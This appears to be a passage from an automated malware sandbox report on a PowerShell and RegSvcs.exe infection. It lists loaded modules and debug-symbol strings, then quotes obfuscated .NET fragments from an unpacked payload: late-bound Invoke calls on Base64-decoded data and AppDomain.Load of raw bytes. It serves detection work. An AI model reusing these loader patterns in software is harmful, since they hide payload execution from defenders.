            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.pdby source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbC source: RegSvcs.exe, 00000003.00000002.4338557949.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb[& source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Core.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: C:\Windows\RegSvcs.pdbpdbvcs.pdbs* source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: mscorlib.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\RegSvcs.pdb{& source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbj? source: RegSvcs.exe, 00000003.00000002.4338557949.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb;&L source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Management.pdb@ source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Xml.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.ni.pdbRSDS source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: n.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbK* source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: n0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2378338667.000001DD8F377000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2405232656.000001DDA75F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2378338667.000001DD90339000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: mscorlib.pdb/ source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Configuration.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: mscorlib.pdboft.NET/Framework/v4.0.30319/RegSvcs.exe// source: RegSvcs.exe, 00000003.00000002.4338557949.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: %%.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp, WERD60D.tmp.dmp.11.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdbv source: RegSvcs.exe, 00000003.00000002.4338557949.000000000102C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbtP]q source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Drawing.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Management.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Management.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.pdb4 source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Core.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 00000003.00000002.4348321743.000000000569B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb` source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.ni.pdb source: WERD60D.tmp.dmp.11.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WERD60D.tmp.dmp.11.dr

            Data Obfuscation

            barindex
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.GkEAxd3nJ5T2No6D7GAPyTu9H2RCHhovmhce8vUtvQRZwS3Llj8PT6QyxoB8ejmDziCHqIJETc8,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv._0DtSY0DAdvftfFE2pUuSLnTfHqIJzYq6DkKj7o2H1UhyfuKOT9OoONpBct4AEPnNiLvJwXthHl1,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv._6rmQnBxYz9wFjXeTkpWUZeLOu39HgSUqZd71j1za1gv5xaKy4Tw5vv0iULTi38ZgN6lxg4rgfwl,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.hQAzsDTmejtRzFTAGYZ9JLeR7bLH9yKFQ8A2gM6qfonXx3k8I99ygySzYyrHqAscPInDM6HYvbS,UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.xRBnfzrwWduwbc5XTg9GoORqm0jrxu8hsNXppUjoIbTyMyOoWfQiJYASUrhx9r5waTu9nCfcEhqJO()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WZwBd3zn7jOgzxsKXNaDlesEnLuPYUA1uQqFNhzgkdmNERsGyqQhPXrsafxny5m0W7nuPXGTdQtmfsddE4HLKdFEYHN2[2],UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.JF9XD3PKLzllq7mNRKeF2ZEh4ezaBNAJbPZaWmOdDth4i0epPbsZqo1dmRi2God1jSSCOTuXb9M1p(Convert.FromBase64String(WZwBd3zn7jOgzxsKXNaDlesEnLuPYUA1uQqFNhzgkdmNERsGyqQhPXrsafxny5m0W7nuPXGTdQtmfsddE4HLKdFEYHN2[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.GkEAxd3nJ5T2No6D7GAPyTu9H2RCHhovmhce8vUtvQRZwS3Llj8PT6QyxoB8ejmDziCHqIJETc8,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv._0DtSY0DAdvftfFE2pUuSLnTfHqIJzYq6DkKj7o2H1UhyfuKOT9OoONpBct4AEPnNiLvJwXthHl1,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv._6rmQnBxYz9wFjXeTkpWUZeLOu39HgSUqZd71j1za1gv5xaKy4Tw5vv0iULTi38ZgN6lxg4rgfwl,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.hQAzsDTmejtRzFTAGYZ9JLeR7bLH9yKFQ8A2gM6qfonXx3k8I99ygySzYyrHqAscPInDM6HYvbS,UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.xRBnfzrwWduwbc5XTg9GoORqm0jrxu8hsNXppUjoIbTyMyOoWfQiJYASUrhx9r5waTu9nCfcEhqJO()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WZwBd3zn7jOgzxsKXNaDlesEnLuPYUA1uQqFNhzgkdmNERsGyqQhPXrsafxny5m0W7nuPXGTdQtmfsddE4HLKdFEYHN2[2],UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.JF9XD3PKLzllq7mNRKeF2ZEh4ezaBNAJbPZaWmOdDth4i0epPbsZqo1dmRi2God1jSSCOTuXb9M1p(Convert.FromBase64String(WZwBd3zn7jOgzxsKXNaDlesEnLuPYUA1uQqFNhzgkdmNERsGyqQhPXrsafxny5m0W7nuPXGTdQtmfsddE4HLKdFEYHN2[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: N4FYw4dMKIlrkiRxPMqNSNPXd3XzaB2on7k6EPgYotmrpL1DJJT6s4bQ0Jpi System.AppDomain.Load(byte[])
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: e3ycssMggM4Z0yhJrvZIintLtrlI020oigf6aNHIG4CIeWFdy8mI6Bs5fAJKAMhkol3VWhdpz8k61jdKu3tvj6QoAOmA System.AppDomain.Load(byte[])
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: e3ycssMggM4Z0yhJrvZIintLtrlI020oigf6aNHIG4CIeWFdy8mI6Bs5fAJKAMhkol3VWhdpz8k61jdKu3tvj6QoAOmA
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: N4FYw4dMKIlrkiRxPMqNSNPXd3XzaB2on7k6EPgYotmrpL1DJJT6s4bQ0Jpi System.AppDomain.Load(byte[])
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: e3ycssMggM4Z0yhJrvZIintLtrlI020oigf6aNHIG4CIeWFdy8mI6Bs5fAJKAMhkol3VWhdpz8k61jdKu3tvj6QoAOmA System.AppDomain.Load(byte[])
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: e3ycssMggM4Z0yhJrvZIintLtrlI020oigf6aNHIG4CIeWFdy8mI6Bs5fAJKAMhkol3VWhdpz8k61jdKu3tvj6QoAOmA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FF848F35801 push E95D70D4h; ret 0_2_00007FF848F35829
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01508080 push eax; iretd 3_2_01508081
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01504CC8 pushad ; retf 3_2_01504CD1
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, jlP9ZmdwEcSal0DicgRXsFBAsRfalWtK8ACjZN20FmtLoweURb4IYXHMKD2jaT0u384K7iAfr5Cnm.csHigh entropy of concatenated method names: '_3TNqZ5hEQVdooCaFVGMhOACTkYaCnTtbNyPGedVllTTfJY1ngUvGia8lhIVPmVUfboypRhwske82g', '_9hHmMsNWAQ6pax4hFZSp7KQG0rewoH7osRvhlI61xGEa9wmvjJneedEBnJlIm8ZEnxTWhRNJPkX6Y', '_49h5GNrcmqMaLuCg35WCTCs0h7BKuHAJaBowmRkClgoGOAsQ5inXYS1I0M7Z4aMeT3m9F31FvkW4S', 'PaOgG4FwzNenoLAMiHTHwPqA01MCJnbz4LPDBsbvSv1JUtf62uk5cC2FEJF1ahKJztdhgk', 'eyvfhsKHdxCVDDLO16w9bGJuDfMJixaw3yryvgfDvZpwSeF25JUC5FWDVzeVdYdoClck1f', 'J8aYoV2Df2dibOrCy3jWkKuxTQGwmadjsTkX0of9qc6qZW1dbylXmhbywydmt9LWAvlhFE', 'RQjJNYKDaRYNkmSSONuq1KvQn8xVeEqpZ43P9vqgNRXMzA99C74pQ7u867FKwVkSrz512z', 'Kr3d4jpdx7Aj5Es33qJdyZ5zLAZ6Oqexmh8VHGcQerW9335ONRoGZWlPv97IHMf5QLBSso', 'NHGZCbXPEwk9PdNJ2mCxrW7xUVF0RMDcuQdhPHTWzD89zg7tMv21UaWUF3nSJoDCbShLB8', 'URJnOTwGHUXQHGoqlnefuWqngz1MSskFe5rCHVNBGx1XVNP7QkTB4aFbYXZsWy4Hcgtyg7'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.csHigh entropy of concatenated method names: 'GzuVwKUZhkX5MaCXS8tELiub2rzA1ABgbXvI4', 'oXpRvTFzCDMB9YdUHEyjFlV0N0YfeW9OJukeK', 'sh0DBD1NjSGAqZVBWAtzcy7TbplyMhoGUfRdG', 'MPt9bvo6JSjfeajadh10xlBrVCyhXGmiVK0rc'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, 0mxMqJmDRkOT353B3lVUMBD9Gejx6UE7bcw8cMUdm3.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'vBcnqg8Bxc612p2B1u3aTcQIPqiV5yrAPbgFT', 'kTfYaHyir2gb88jHa1xDDJOquMyuUmtAsRHRV', 'XxvYgezFFU8AxmQlcN8rTw2L9iLIPa6bPfCOZ', 'MvQTtw3McXFYFf0jea0HcJrIp99lPddWKFt98'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.csHigh entropy of concatenated method names: 'uLcpjPuRlAYcVXjFYFmtEmE6IG3WW1Mtzr0RIFk9A9EyQrTvzKXXIVg2Kl9aPa4ZUwxDazhSAPcV9OBgEpQgQkmuIDh4', 'YKbSLHwMqgcS2pKolhOEHj3xgyFveKjEKCcidxigp4U5yTh4YfVyGzBJwlJcnpP19L9VroiHmlyJuG3idLBl3mCSn6Mm', 'zp4H0yQ0UehqO8XjWJBobcRnUXHtBNNdOJraqUqF18ZXk1TLUu8ITK9oxZPMDksn0W1Pa1Zafu97BPz21DtkMiy8OqlZ', 'acNGsDNjWVethdtOAHfS5bGCQjlG6rRtvqD0T5njuLJ25Dych7HkSrtJugHPYU1sEidvPQu9DNCndDlA1BwGcgqQOkza', 'EYijaGNCTZA5ssmfCphcWBaQGPjJhnvrfOYStXrbSHqI8vBOIvDeyI1zMKU0GLeIXfA35yHnFGzkvaEC5O96miFuyOQc', 'U97RvjaNCYtJiiNUnqYFKh9zn8xByBKWBrFUlgNNn3Y9kt6515ldQ6O97fXLCplKOYUDnKrYZHyKp20hGPYqLPGP43to', 'R5jVmcwmbdTygVF5mseYL7gR5WlhWpIX0SdRUW8f8j2wtWOjloLyaqtkDxKHgIKQPDNnccnKif6EDZ9Yo6kg1mpXNGdk', 'Qg4y4yWaLZe8ShxzIYTJF2jveZABfiLw14cUW2R4nubmT4B60JE6aFHCnRFHd6P1uknuuQS91W4dkE081WxvGjwhal6H', '_5Dw5lOtBWWVVZmthJsMhPC9cUzM5iN8pVJpzSBUee0S2ugQkSBULaRMjDDzaJSKNWwNUaDj8vvXM5hobP13i5jQnjnBo', 'C6Cvo3FCCkFc54Z203lOyD77mYeTf2u9XT2Fg9R2Ovlu8bqQgixOWFkdCS1Rv8ce5gNSQhYPH0Rte8KRxk0sprhtBDOD'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, KqM7OHZ0szpXMKUjIeoOth6ym1BTJiUrVDaPclVtZntCve6UTLSqTCZXaNVMStUq6wiimQow3L7sbJOInc0XhfKzEm5y.csHigh entropy of concatenated method names: 'vlT8dwXrYPa88X2PCSTl1MzL1hOXuK3SZzQ1IazokTftenOcdNLZ16Tqdw7yu5ANElYZlWxgwhbSblLDgcDV4JQrQgpG', 'Yri9DO8KJSBPdGKWv6rruFnfPHpprBjidMFUJ', 'ihN7Vn5g9RpbzGgZUePo8B2niWfMdhDAfds47', 'dvL73CjsvtRpTg2h7knB3tzBhCT55MED4VzHf', 'wdniSU5EpAhXrItpr3nizrrDSwO3uC8vl3Kj9'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, HSVnbciCbEspA5qeJHR9bJSsZnPWuo0GrZXu7MR1gBQLksXwzFXzWWgcApgGUgNKiWg0pwlEuNF.csHigh entropy of concatenated method names: '_2q4wpPRfaVhr0exnXH7y891APAO7HbKET96GKYxGsofSr6nSYQvElSnVQzd4FzDKrH30YbalY8L', 'aWKN8JgTw7OsnLqijS1G2FSf5lKyN1BzTceUS7AusrlZE4LOpgaXcu1Wuwzk1u0fNisdvfs1qDN', 'FJHVAMux3eOse32NPNrYghB0J9OilS0b1VXxCJDJh6FXmI8aBAEjaNpxaC2kopUIxwHOIGv955L', 'jGfRxrKXNpeTM8YO7QPoRJmjQ2fPzxvsBjNLD', 'kZ9PmGZma9rdlqmPKpJGfpPr2H3r8JkUX7S1I', 'AQhlQ1kzIc9Ef2keyCUXapmb3OGi6FTBB2Kva', 'bwp4xqBSAhOIzAidlh3oJJvRivoyrO2AeizFi', 't4NvZMrcVrH5QwGjkdYgS8T6KKd876mvUUikN', 'THXyLh0AdRiaDLkYYQVt4gIf6aGSl2TGIZ0Hv', 'AT1vYmitOvIzOWbQZzZiuTU12J3PiZKXYnxiA'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.csHigh entropy of concatenated method names: 'QVEVDhViI9Msxtf3rvGnQiMgFCItcS0p5D6Z1BTCpo5f6Fde2LisyMtpWmRG', 'N4FYw4dMKIlrkiRxPMqNSNPXd3XzaB2on7k6EPgYotmrpL1DJJT6s4bQ0Jpi', '_1lKSstulGZhXYINkaQd9Asdnrsvcni39pRvUFDpwycuW4xpMqX4hS77iXc6K', 'PNFvO7d1Mi2IWzxMtx1zqm34FyxGrUWwyLxwiGmyaWGVEehy9D6hxvHM1wdE', 'NzfmYhAUGceMKW0mjLzHPddnDgqRRmTH0j9pDfOYWD2DRetXvurMj6Mnbf7d', 'xt4khGVNTHDEWpsI1gYgYvoJk7rms4Vqp4A1OuJJVHK8d5oZr1gtEs3Mjthp', 'zmLy2I6ntM2aqhLCLWxvECHOzvQIBQMbMZRkop6htT9CZiCpf1AwaOdoxGnL', 'lGU48PAY736gsQX2viMog6499aYSQjosLWQRnL6JHFF67P95LEO7pVqTOpjP', 'tWcbDFC14xGh0OYdfNzCiUkAdgC4GkZEk3fcvvyC27fsgUEboKucKM0JQCNsUm0dx4Ht2O9GEH5iHMX42Oi6Tya6c44Z', '_74dfJY6UAxv3WrBFrcQeFUKJoMxCX21o0QCYxD66ZQnhM3Ecq9rhBxcB8PaVyrqjY8AQ0yV0nFGhMbW1o118n5tdEMW0'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, eTjxx5sBsv0TQY2QsBukke7xGuRK5Vrnm4Vc7A6o9H3gWnlfVttPzqM2XIgnZsx9KoT8nFv5wwqNH0KJaX9HbOIURT9H.csHigh entropy of concatenated method names: 'MqoWDQphzr8fvnkIH9zEEDcDy7t0zalckB2FahnIxepzgPAMJUZvXj5AyxTxgsTptxlaeKuQhZNQ652tx2KfrWb4jegt', '_39p79IiNTKU0DvuMDijBA51wmgQCy8uNaqsmM', 'VTi9WoIpssJGUPzXMbuMCGF0hZYIeuMphrb9F', 'iVslLiCsMBZl1LzuhzFMYBpuQXVYU9MiwNoac', 'Tmceex3fvKsJkAkUdbAOatlNKDEvt7aWE2OZV'
            Source: 0.2.powershell.exe.1dd90374f68.2.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.csHigh entropy of concatenated method names: 'czdLIkkJGHePbv60eOuYeyQebTWkxLQxtIBDozzTkzeHjwvF0iZ9WLXSXldzQJva2vLFfWmskZn', 'j4gQD94PHOIvfqwgF8eMCnFm32o0IB5Ap5qxVVZaFRLKmaLwc0kz81j2suIyuSG55aCfkON107y', 'K6lV2zL7a7baiNZWYLV0Pa7uhSeNElH68zllWH3k55hqCfKpRoNiazcpVFJa', '_3pqyNrhtv7CmhWTfIKaVxCTfMxlC4kt3daOpdYBPiciiKcXwK1tRoUER3QN3', 'jxIHzBWZPIwWF5Me16RXKy5D4q8hbHjIdITEMMSQOScHVlETgFjWzxFrMe5o', 'rgHuZwYDAVkDNu5fiQGgpbr60XJ1IwMKjiCWFJ4F1RAlRxZyaVrVBTTv5GYA', 'zv9n71pQ0f50PGPzTuOQ3EzQE9qjMl5Z2yV4UK950JFaZNBxHTG4HgTd1jZ6', '_5jeSQ3EJhe2fy9ifCjr5hanazmLriQS1eJsXevXq9vWo9BtzOTy0qlNTrwXI', 'yDpWKuZ7sOl8dZSwzdYBzBedzlS61vlzsjKG7qtZRtuBOZBV1zTFKonJ80td', '_4QkPUIxQHkmMssVmBG2fIN5OOjEuP5kl4bcy3jjLl4JdQehPZIYuCigGsUp8'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, jlP9ZmdwEcSal0DicgRXsFBAsRfalWtK8ACjZN20FmtLoweURb4IYXHMKD2jaT0u384K7iAfr5Cnm.csHigh entropy of concatenated method names: '_3TNqZ5hEQVdooCaFVGMhOACTkYaCnTtbNyPGedVllTTfJY1ngUvGia8lhIVPmVUfboypRhwske82g', '_9hHmMsNWAQ6pax4hFZSp7KQG0rewoH7osRvhlI61xGEa9wmvjJneedEBnJlIm8ZEnxTWhRNJPkX6Y', '_49h5GNrcmqMaLuCg35WCTCs0h7BKuHAJaBowmRkClgoGOAsQ5inXYS1I0M7Z4aMeT3m9F31FvkW4S', 'PaOgG4FwzNenoLAMiHTHwPqA01MCJnbz4LPDBsbvSv1JUtf62uk5cC2FEJF1ahKJztdhgk', 'eyvfhsKHdxCVDDLO16w9bGJuDfMJixaw3yryvgfDvZpwSeF25JUC5FWDVzeVdYdoClck1f', 'J8aYoV2Df2dibOrCy3jWkKuxTQGwmadjsTkX0of9qc6qZW1dbylXmhbywydmt9LWAvlhFE', 'RQjJNYKDaRYNkmSSONuq1KvQn8xVeEqpZ43P9vqgNRXMzA99C74pQ7u867FKwVkSrz512z', 'Kr3d4jpdx7Aj5Es33qJdyZ5zLAZ6Oqexmh8VHGcQerW9335ONRoGZWlPv97IHMf5QLBSso', 'NHGZCbXPEwk9PdNJ2mCxrW7xUVF0RMDcuQdhPHTWzD89zg7tMv21UaWUF3nSJoDCbShLB8', 'URJnOTwGHUXQHGoqlnefuWqngz1MSskFe5rCHVNBGx1XVNP7QkTB4aFbYXZsWy4Hcgtyg7'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.csHigh entropy of concatenated method names: 'GzuVwKUZhkX5MaCXS8tELiub2rzA1ABgbXvI4', 'oXpRvTFzCDMB9YdUHEyjFlV0N0YfeW9OJukeK', 'sh0DBD1NjSGAqZVBWAtzcy7TbplyMhoGUfRdG', 'MPt9bvo6JSjfeajadh10xlBrVCyhXGmiVK0rc'
            Source: 0.2.powershell.exe.1dd8f552668.4.raw.unpack, 0mxMqJmDRkOT353B3lVUMBD9Gejx6UE7bcw8cMUdm3.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'vBcnqg8Bxc612p2B1u3aTcQIPqiV5yrAPbgFT', 'kTfYaHyir2gb88jHa1xDDJOquMyuUmtAsRHRV', 'XxvYgezFFU8AxmQlcN8rTw2L9iLIPa6bPfCOZ', 'MvQTtw3McXFYFf0jea0HcJrIp99lPddWKFt98'
